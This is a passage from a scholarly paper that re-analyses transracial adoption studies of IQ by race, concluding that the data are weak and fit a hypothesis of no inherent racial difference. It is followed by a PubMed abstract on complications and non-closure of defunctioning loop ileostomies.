The above discussion of Black adoptees' IQs made one reviewer unhappy; they felt it was "selective" because "Flynn effect corrections are applied only to the East Asian groups, never to the Blacks". However, there is a solid methodological reason for this: one *must* make Flynn effect corrections to interpret the three studies of East Asians, because those studies lacked comparison groups of adoptees of other races, forcing a comparison of the East Asian adoptees to the general population norm. At the same time, the studies with Black adoptees contained multiple groups which could be compared to *each other*, and such comparisons need no Flynn effect correction. The one possible exception is the MTRAS, afflicted by a hard-to-predict Flynn effect mentioned above. The published MTRAS reports do not have enough information to correct for that Flynn effect, so I take the published data as given while warning that a Flynn effect might have skewed them. This is better than the reviewer's defective approach of taking sample-size-weighted racial averages of the means in my [Table 1](#jintelligence-05-00001-t001){ref-type="table"} (thereby double counting some of the data, because Weinberg et al.'s sample is a subset of Scarr and Weinberg's) and indiscriminately subtracting 10 points from each average (neglecting the fact that the Flynn effect inflated IQs to different degrees in different samples).
6. Summarizing My Re-Analyses {#sec6-jintelligence-05-00001}
I have now reviewed all of the transracial adoption studies cited by peer-reviewed papers as part of the race and IQ debate. Reviewing the data with a less selective eye, and making allowances for the Flynn effect, adoptive IQ boosts, and attrition in a longitudinal study, the results are equivocal. One study of East Asian adoptees documents an IQ advantage, while two more suggest IQ disadvantages. A sample-size-weighted average of the results would give a slight IQ disadvantage, though this result could be strengthened or reversed depending on what one assumes about the adoptive IQ boost in these samples. Meanwhile, one study of Black adoptees documents an IQ disadvantage, while two more suggest IQ advantages. Merging the studies' results suggests an inconsistent IQ disadvantage, but that conclusion can only be a weak one since the studies are small, statistically heterogeneous, and open to alternative interpretations.
The data are too patchy and inconsistent for conclusive inferences, but taken together they are evidence against the hereditarian hypothesis. The net racial IQ differences are small and some disagree with the hereditarian model's predictions. The nil hypothesis---that adoptees of different races have similar IQs when raised in the same environment---fits the data at least as well. For East Asian adoptees, my sample-size-weighted average IQ is about 97 (which I derive from midpoints of the IQ ranges in [Table 2](#jintelligence-05-00001-t002){ref-type="table"}, subtracting 6 points for the adoptive boost), which would plausibly be a bit higher were malnutrition allowed for. Based on the studies of Black--Black and BW transracial adoptees I expect them to have mean IQs of about 92 and 100 respectively, but these estimates are shaky, undermined by heterogeneity and the Black adoptees in Scarr and Weinberg \[[@B13-jintelligence-05-00001]\] having less salubrious rearing circumstances. The East Asian and Black averages could plausibly be within a couple of points of 100 if measured with more precision, and if no Black adoptees were raised in environments measurably unequal to those of White adoptees.
The studies reviewed so far have proven inconclusive. An obvious next step is to seek more data to see how well competing hypotheses accommodate them. The study list in van IJzendoorn et al.'s [Table 1](#jintelligence-05-00001-t001){ref-type="table"} \[[@B17-jintelligence-05-00001]\] contains three more studies of the IQs of transracially adopted East Asians, namely Lien et al. \[[@B30-jintelligence-05-00001]\], Wattier and Frydman \[[@B33-jintelligence-05-00001]\], and Stams et al. \[[@B34-jintelligence-05-00001]\]. My own searches turned up another study, Loman et al. \[[@B35-jintelligence-05-00001]\], as well as Dalen et al. \[[@B36-jintelligence-05-00001]\] and Lindblad et al. \[[@B37-jintelligence-05-00001]\], two papers about entire cohorts of Swedish men. I now discuss the results of all six papers.
7. Lien et al., 1977 {#sec7-jintelligence-05-00001}
Lien et al. \[[@B30-jintelligence-05-00001]\] essentially replicated Winick et al. \[[@B10-jintelligence-05-00001]\], but studied Koreans adopted later. It confirmed a dose--response relationship between malnourishment and IQ deficits: 31 "severely malnourished" adoptees had a mean IQ of 95, 62 "moderately malnourished" adoptees a mean IQ of 101, and 39 "well-nourished" adoptees a mean IQ of 105 (pp. 1735--1736). Between 1973 and 1975 the children took the same IQ tests as those in Winick et al., but there is no precise breakdown of how many took each test. As such, the Flynn effect inflation of IQs could have been minute or could have been as high as 12 points. Subtracting a middling estimate of 6 points from these adoptees' IQ averages implies an overall mean IQ of 95. Subtracting the effect of the adoptive IQ boost would shrink this average further, probably below 90.
8. Wattier and Frydman, 1985 {#sec8-jintelligence-05-00001}
Wattier and Frydman \[[@B33-jintelligence-05-00001]\], like Frydman and Lynn \[[@B11-jintelligence-05-00001]\], considered the IQ of a few Asian children adopted in Belgium. From the abstract: "the authors present a study made in 1983 on a sample of 28 children from South-East Asia and adopted four to twelve years earlier by Belgian francofone \[sic?\] families living in the province of Hainaut". The rest of the paper is in French, making it hard for me to read it closely, but its summary table (on page 67 and unnumbered) is clear enough: the sample's mean score on the WISC/WPPSI was 116.6 with a standard deviation of 11.04. The mean VIQ was 110.8 and the mean PIQ was 119.8. Making the same Flynn effect adjustment as for Frydman and Lynn \[[@B11-jintelligence-05-00001]\] leads to a mean VIQ of 99 and a mean PIQ of 96--100, both less than the Belgian norm. Subtracting an adoptive boost effect would bring them lower.
9. Stams et al., 2000 {#sec9-jintelligence-05-00001}
The Stams et al. study \[[@B34-jintelligence-05-00001]\] appears to be unique in having used one IQ test to compare East Asian transracial adoptees of both sexes to non-East Asian transracial adoptees. Specifically, in 1995 \[[@B38-jintelligence-05-00001]\], 100 Sri Lankan adoptees, 11 Colombian adoptees and 36 South Korean adoptees, all raised by "Caucasian white" parents, took the abbreviated Revised Amsterdam Child Intelligence Test (RAKIT) at age 7, with their raw scores converted to standardized IQs "derived from a representative sample of 1415 children between age 4 and 11, drawn from the Dutch general school population in 1982" \[[@B34-jintelligence-05-00001]\] (pp. 1026--1028). The children were all adopted reasonably close to birth, with the Sri Lankans having a mean adoptive age of 7 weeks (with an SD of 3 weeks) and the Koreans and Colombians a mean adoptive age of 15 weeks (SD 4 weeks). However, the Korean and Colombian adoptees "stayed in an institution or foster home after separation from their biological mother at birth, until their adoption", while the Sri Lankan children "were in the care of their biological mother until their adoption" (p. 1026). Although "\[l\]ittle is known about the child-rearing conditions of the Sri Lankian \[sic\] infants", "\[a\]necdotal evidence from parent reports" indicated that "pre- and post-natal care for the relinquishing mother and her baby were far from optimal \[...\] and the health condition of the mother was deplorable in many cases" (p. 1027). This may explain the relatively low mean IQ of 104 for the Sri Lankan adoptees, compared to mean IQs of 112 and 115 for the Colombian and Korean adoptees respectively.
The adoptee--adoptee comparisons need no Flynn effect correction because the study's adoptees were tested approximately simultaneously. However, a correction is necessary if one wishes to compare the adoptees to the RAKIT's standardization sample. Wicherts et al. \[[@B39-jintelligence-05-00001]\] (pp. 524--525) report that Dutch 5-year-olds gained 2.8 IQ points on the test from 1982 to "1992/1993", though the 1992--1993 sample was marginally above average in SES; extrapolating that rate of gain across the 1982--1995 period, the Stams et al. adoptees' IQs were inflated by 3--4 IQ points. This just about explains the elevated mean IQ of the Sri Lankan adoptees, but not the higher means of the Colombian and Korean adoptees.
10. Loman et al., 2009 {#sec10-jintelligence-05-00001}
Loman et al. \[[@B35-jintelligence-05-00001]\] wished to observe how post-institutionalized adoptees from outside the US ("who were adopted at 12 months of age or older and spent 75% or more of their preadoptive lives in institutional care") developed differently to "children internationally adopted early, predominantly from foster care" and non-adopted children "raised continuously in their biological families in the United States" (pp. 427--428). Their group of post-institutionalized adoptees was made up of 42 Russian and Eastern European (R&EE) adoptees, 41 Asian adoptees, seven South American adoptees, and a single Ethiopian adoptee.
As part of the project, the researchers extrapolated the children's IQs from their performance on the WISC-III's block design and vocabulary subtests, except for the children who "scored \>1 SD below the mean on either WISC-III subtest". The latter children then took the Leiter International Performance Scale-Revised, and their IQ was taken as their "Leiter Brief IQ score" instead (p. 429).
[Table 3](#jintelligence-05-00001-t003){ref-type="table"} of Loman et al. \[[@B10-jintelligence-05-00001]\] broke down "Estimated IQ" by country of origin. Its mean and standard deviation were 99.6 ± 15.0 for the R&EE adoptees (*n* = 41), 95.6 ± 17.1 for the South American adoptees (*n* = 7), and 107.7 ± 18.3 for the Asian adoptees (*n* = 40). Loman et al.'s *F*-test of these gave a statistically insignificant result ("F(2,88) = 1.56, NS"), and their paper inferred "no region-of-origin differences in estimated IQ" (p. 431). However, a Welch's *t*-test of the difference between the Asian and the R&EE adoptees (8.1 points with a standard error of 3.7 points) rejects the null hypothesis of zero difference (*p* = 0.033, although one can argue that the explicit significance level should be less than 0.05 to account for potential multiple comparisons).
This difference is meaningfully large and arguably statistically significant, but there is an obstacle to calling it a White-East Asian racial difference. The R&EE adoptees were presumably all White (coming from Russia, Romania, Bulgaria, Slovakia, Ukraine, Moldova, and Poland) but the Asian subsample comprised 22 Chinese children, three Filipino children, a Vietnamese child, and 15 Indian children, so it was roughly a 2:1 mixture of East Asian and South Asian adoptees. The observed difference is therefore one between White adoptees and an agglomeration of East Asian and South Asian adoptees.
I might also compare the adoptees to the general population, although the necessary Flynn effect adjustment is compromised by the administration of only two WISC-III subtests. The study's IQ testing took place between 2005 and 2007 \[[@B40-jintelligence-05-00001]\]. The WISC-III was standardized in 1989 \[[@B7-jintelligence-05-00001]\] (p. 214) and the LIPS-R in 1995 and 1996 to match the 1993 US Census \[[@B41-jintelligence-05-00001],[@B42-jintelligence-05-00001]\]. Therefore the WISC-III takers were supported by a Flynn effect of 4.8--5.4 points, and the LIPS-R takers by one of 2.7--3.6 points. Taking the midpoints of those two intervals, and weighting the midpoints using the fact that 23.1% of the post-institutionalized adoptees took the LIPS-R \[[@B35-jintelligence-05-00001]\] (p. 429), the post-institutionalized adoptees would have had their average IQ estimates inflated by 4.6 points. Subtracting that figure from each subgroup mean gives estimated IQ means and standard errors of 95.0 ± 2.3 for the R&EE adoptees, 91.0 ± 6.5 for the South American adoptees, and 103.1 ± 2.9 for the Asian adoptees. Incorporating the expected adoptive boost, the Asian adoptees' mean extrapolated IQ would probably be similar to that of the general population, and the mean extrapolated IQs of the R&EE and South American adoptees appreciably less.
11. Dalen et al., 2008, and Lindblad et al., 2009 {#sec11-jintelligence-05-00001}
Dalen et al. \[[@B36-jintelligence-05-00001]\] and Lindblad et al. \[[@B37-jintelligence-05-00001]\] are the only studies I have found which took a systematic national sample instead of relying on a convenience sample. I discovered the Lindblad et al. paper first but focus on Dalen et al.'s as its sample greatly overlaps Lindblad et al.'s and is over twice as large.
Dalen et al.'s "study population was drawn from all male residents in Sweden born between 1968 and 1976 who were conscripted before 20 years of age \[...\] and were still residents in Sweden at follow-up in December 2001", and had "complete information on all four intelligence test variables" (p. 1213). They divided the bounty of this expansive sampling frame into six groups: Korean adoptees, non-Korean foreign adoptees, domestic adoptees born in Sweden, non-adopted siblings of foreign adoptees, non-adopted siblings of domestic adoptees, and the general population, defined as "Swedish-born offspring of two Swedish-born parents with no record of ever having adopted a child".
When registering for conscription, these men took "Enlistment battery 80", "an intelligence test" which gave "a global score derived from the four subtests"; the global scores "had a Gaussian distribution of scores between 1 and 9" (p. 1214). Dalen et al.'s [Table 2](#jintelligence-05-00001-t002){ref-type="table"} gives the mean and standard deviation of the global scores within all six groups, which I transform to an IQ scale, taking the general population's mean and standard deviation as 100 and 15 by definition. [Table 3](#jintelligence-05-00001-t003){ref-type="table"} summarizes the results.
Lindblad et al. mention (p. 303) that the non-Korean foreign adoptees were a mixture of Black (Ethiopian) adoptees, East Asian (Thai) adoptees, and adoptees who were neither Black nor East Asian nor White (Indian, Chilean, Sri Lankan, Colombian, and Ecuadorian adoptees, among others), so the non-Korean foreign adoptees are a suboptimal comparison group for the Korean adoptees. The domestic adoptees, however, were presumably almost all White, and they scored 6.2 points below the Korean adoptees. Selective placement likely plays a part in the latter result, as the domestic adoptees' non-adopted siblings scored 7.5 points below the foreign adoptees' non-adopted siblings.
I may also compare the Korean adoptees to the general population. (Unlike the older studies of East Asian adoptee IQ, the Flynn effect is irrelevant here because the adoptees were tested over the same period as the general population.) The Korean men scored only 1.5 IQ points above Swedish sons of non-adopting Swedish parents. This is rather less than the "10 or more points higher than \[Korean and Vietnamese adoptees'\] adoptive national norms" inferred by Rushton and Jensen \[[@B3-jintelligence-05-00001]\] (p. 276) from older adoption studies. Indeed, although statistically significant because of the samples' large size, the 1.5-point difference is scarcely practically significant, and would be reversed were one to allow for the usual adoptive IQ boost, especially a boost enhanced by selective placement.
12. Summarizing the Additional Studies {#sec12-jintelligence-05-00001}
Lien et al. \[[@B30-jintelligence-05-00001]\] and Wattier and Frydman \[[@B33-jintelligence-05-00001]\] suggest a mean East Asian transracial adoptee IQ below 100. Stams et al. \[[@B34-jintelligence-05-00001]\] is harder to interpret; although that study's East Asian adoptees were tested alongside non-East Asian adoptees, the non-East Asian adoptees do not fit cleanly into the usual hereditarian racial framework of Whites, Blacks, and East Asians, so it's unclear how to test the hereditarian hypothesis against these data. In any event, its 36 South Korean adoptees had a mean IQ 3 points higher than 11 Colombian adoptees, and 11 points higher than 100 Sri Lankan adoptees. These differences cannot be explained in terms of adoptive age, although the Sri Lankans may have suffered less healthy birth environments. Overall, the Colombian--Korean IQ difference remains marginal evidence in favour of the hereditarian hypothesis and against the nil hypothesis. Loman et al. \[[@B35-jintelligence-05-00001]\] likewise hints at a higher IQ for Asian adoptees than for White and South American adoptees, but that finding is blurred by the Asian subsample including South Asians, the study's use of incomplete test batteries, and the Flynn effect's ability to explain most of the apparent Asian adoptee advantage. Dalen et al. \[[@B36-jintelligence-05-00001]\] and Lindblad et al. \[[@B37-jintelligence-05-00001]\], the largest studies of East Asian transracial adoptees' IQs, found those IQs were only marginally higher than those of Swedish men in general, suggesting a mean IQ below 100 in the absence of the adoptive boost. Although Stams et al. \[[@B34-jintelligence-05-00001]\] and Loman et al. \[[@B35-jintelligence-05-00001]\] find that East Asian transracial adoptees outscored other adoptees, the overall drift of the additional studies is that East Asian transracial adoptees do not tend to have unusually good IQs in their adoptive nations. Appearances to the contrary are a result of ignoring their atypically salutary adoptive homes and of failing to accommodate the Flynn effect.
13. Conclusions {#sec13-jintelligence-05-00001}
Drawing together this paper's re-analyses, I conclude that East Asian adoptees raised by Western Whites score about on par with non-adopted Western Whites, and that there is no consistent IQ difference between Black adoptees raised by Whites and White adoptees raised by Whites. Meanwhile, some studies document East Asian adoptee samples with higher IQs than non-East Asian adoptee samples, but it is not clear that any offer a clean comparison of East Asian adoptees and White or Black adoptees in similar environments on complete IQ batteries.
These inferences must be provisional because the studies give conflicting results, most of the studies are small, and all are methodologically flawed. Only two of the papers reviewed here drew on samples of foreign adoptees that were nationally representative, and then only of males, and *then* only of the adoptees in the destination country, not of inhabitants of their birth country.
Indeed, given the obvious difficulties with ethically taking a random sample of newborns in one country and having them adopted into random foreign homes, it seems unlikely that any fully representative study will ever be done. It follows that transracial adoption studies are unlikely to conclusively settle the race and IQ debate, since commentators may always level the valid methodological objection of unrepresentative sampling. It is nonetheless worthwhile to correct misleading claims about transracial adoptee IQ data, which are still made: see Christainsen's remark that "East Asians growing up in white households in the US and Belgium have tended to score considerably above the white mean in terms of intelligence" \[[@B43-jintelligence-05-00001]\] (p. 168). (Christainsen wrote next that "East Asians, or at least the Chinese among them, also tend to be relatively quiescent *independently of their child-rearing environment* and also have less variable heart rates (Kagan, Resnick, \[sic\] and Snidman 1988)". However, Kagan, Reznick and Snidman \[[@B44-jintelligence-05-00001]\] (p. 167) studied "three cohorts of Caucasian children from working- and middle-class Boston homes", not Chinese children.)
As well as correcting specific claims, my re-analyses enable a fresh comparison of the hereditarian model to the data. Provisionally, the hereditarian model fails to fit the data when one applies the level of standard applied by hereditarians such as Rushton, Jensen and Lynn. For instance, Rushton and Jensen \[[@B3-jintelligence-05-00001]\] (p. 276) wrote that "\[t\]he culture-only model cannot explain" the "finding" that "Korean and Vietnamese children adopted into White homes, even though as babies many had been hospitalized for malnutrition, nonetheless grew to have IQs 10 or more points higher than their adoptive national norms". That comparison was fallacious because it neglected the Flynn effect and the unrepresentative environments in which adoptees live. Allowing for both effects, I estimate that East Asian adoptees tend to have IQs about equal to the relevant norms, and possibly a little below. This is what a nil hypothesis, and presumably a "culture-only model", would predict, but it violates the hereditarian expectation of superior East Asian IQ. Contrary to Rushton and Jensen's \[[@B3-jintelligence-05-00001]\] (p. 276) allegation that "support for the hereditarian model again comes from adding the East Asian data to the mix", the hereditarian model has at least as much trouble with the East Asian data as with the Black data. The model is not definitively ruled out; the data are too weak for that. However, a hypothesis that fits these data, at least as well, is the nil hypothesis: adoptees of different races would have similar IQs if raised in the same environment. To the extent that the nil hypothesis is true, genes are not so likely to be the main cause of racial IQ differences.
The author declares no conflict of interest.
jintelligence-05-00001-t001_Table 1
Studies of IQs of transracial adoptees adopted by Whites: unadjusted results.
Study Group *N* Age at Testing Reported IQ
------------------------------------------ ----- ---------------- ------------- ----------
*Tizard, 1974*
White 17 4.5 113.0 7.8
Black--White 7 4.5 119.9 16.6
*Winick, Meyer, and Harris, 1975*
East Asian, "malnourished" 36 ≥6 102 9.7 ^b^
East Asian, "moderately nourished" 38 ≥6 106 12.5 ^b^
East Asian, "well-nourished" 37 ≥6 112 9.0 ^b^
*Scarr and Weinberg, 1976*
White 25 5--21 111.5 16.1
Black--White 68 4--16 109.0 11.5
Black--Black 29 4--16 96.8 12.8
*Clark and Hanisee, 1982*
East Asian 25 2.5--6 120 16
*Moore, 1986*
Black--White 14 7--10 116.5 8.2 ^c^
Black--Black 9 7--10 118.0 10.5 ^c^
*Frydman and Lynn, 1989*
East Asian 19 6--14 118.7 10.4
*Weinberg, Scarr, and Waldman, 1992* ^a^
White 16 15--31 105.6 14.9
Black--White 55 14--26 98.5 10.6
Black--Black 21 14--26 89.4 11.7
^a^ Weinberg, Scarr, and Waldman's 1992 paper is a longitudinal follow-up to Scarr and Weinberg's 1976 paper, so the former's sample is a subset of that presented in the latter; ^b^ Standard deviations for Winick, Meyer, and Harris \[[@B10-jintelligence-05-00001]\] read off graphically from a digital copy of their paper; my estimates are probably accurate to 0.4 IQ points; ^c^ Pooled standard deviations computed from separate standard deviations for male and female subgroups.
jintelligence-05-00001-t002_Table 2
Studies of IQs of transracial adoptees adopted by Whites: partially adjusted results.
Study Group *N* Mean IQ Adjusted for
--------------------------------------- ---------------- ------------- -------------- --------------
*Tizard (1974)*
White 17 113.0 -- nothing
Black--White 7 119.9 -- nothing
*Winick, Meyer, and Harris (1975)*
East Asian, "malnourished" 36 102 91--102 Flynn effect
East Asian, "moderately nourished" 38 106 95--106 Flynn effect
East Asian, "well-nourished" 37 112 101--112 Flynn effect
*Scarr and Weinberg (1976)*
White 25 111.5 -- nothing
Black--White 68 109.0 -- nothing
Black--Black 29 96.8 -- nothing
*Clark and Hanisee (1982)*
East Asian 25 120 112--114 Flynn effect
*Moore (1986)*
Black--White 14 116.5 -- nothing
Black--Black 9 118.0 -- nothing
*Frydman and Lynn (1989)*
East Asian 19 110.6 (VIQ) 99 (VIQ) Flynn effect
123.5 (PIQ) 100--103 (PIQ)
*Weinberg, Scarr, and Waldman (1992)*
White 16 105.6 101.8 attrition
Black--White 55 98.5 98.3 attrition
Black--Black 21 89.4 90.1 attrition
jintelligence-05-00001-t003_Table 3
Cognitive-test scores of Swedish men, adopted and non-adopted.
Study Group Dalen et al. (IQ) Lindbland et al. (Stanine)
----------------------------------------- ------------------- ---------------------------- ------ ----------- -----------
General population 342,526 100 15 142,024 5.26
Korean adoptees 780 101.5 15.2 320 5.31
Non-Korean foreign adoptees 1558 88.6 13.7 1125 3.96
Foreign adoptees' non-adopted siblings 357 108.5 14.2 190 6.17
Domestic adoptees 1153 95.3 15.1 not given not given
Domestic adoptees' non-adopted siblings 286 101.0 15.9 not given not given
Results extracted from [Table 2](#jintelligence-05-00001-t002){ref-type="table"} of Lindblad et al.'s report \[[@B37-jintelligence-05-00001]\] (which gives mean scores on an apparent stanine scale, but not standard deviations, preventing conversion of the means to an IQ scale) and computed from [Table 2](#jintelligence-05-00001-t002){ref-type="table"} of Dalen et al.'s report \[[@B36-jintelligence-05-00001]\].
| {
"pile_set_name": "PubMed Central"
} |
Defunctioning loop ileostomy for pelvic anastomoses: predictors of morbidity and nonclosure.
The aim of this study was to determine the morbidity of a defunctioning loop ileostomy and the subsequent closure rate, and to identify the predictors of complications and nonclosure of stoma. This study is a retrospective review of a single-institution experience. All patients who underwent a planned temporary defunctioning loop ileostomy performed synchronously with a pelvic anastomosis during a 6-year period were included. The primary outcome measures were the ileostomy complication rate for the entire spectrum of care, readmission and reoperation rates to treat ileostomy complications, and subsequent closure rate. Patient and treatment factors were evaluated for their independent effect on complications and closure rate with the use of multivariable logistic regression. One hundred twenty-three patients were identified (median age, 51 years). Of these patients, 64.2% developed ≥1 minor or major ileostomy complications (13.8% during index hospitalization, 52.8% as outpatient, and 23.4% after closure). Readmitted for dehydration following ileostomy formation were 11.4% of patients. The ileostomy was closed in 76.4% of patients with 8.6% requiring a midline laparotomy. The overall ileostomy-related reoperation rate was 10.4% (2.4% during index hospitalization, 1.6% at readmission, and 6.4% following ileostomy closure). Obesity (BMI ≥30 kg/m) was associated with a higher overall ileostomy complication rate (OR 8.56, 95% CI 1.64-44.74) and outpatient complication rate (OR 7.69, 95% CI 2.48-23.81). Age >65 years (OR 53.34, 95% CI 4.21-676.14) and hypertension (OR 8.36, 95% CI 1.09-64.43) increased the risks of high ileostomy output and dehydration. Obesity (OR 4.61, 95% CI 1.14-18.54) and smoking (4.47, 95% CI 1.43-13.98) decreased the likelihood of ileostomy closure. This study was limited by its retrospective nature. The morbidity of a defunctioning loop ileostomy remains significant. Obesity is an independent predictor of ileostomy complications. Older age and hypertension increase the risks of high-output stoma and dehydration. Almost one quarter of patients never have the ileostomy closed. Obesity and smoking are associated with less likelihood of a subsequent ileostomy closure. | {
"pile_set_name": "PubMed Abstracts"
} |
Subsets and Splits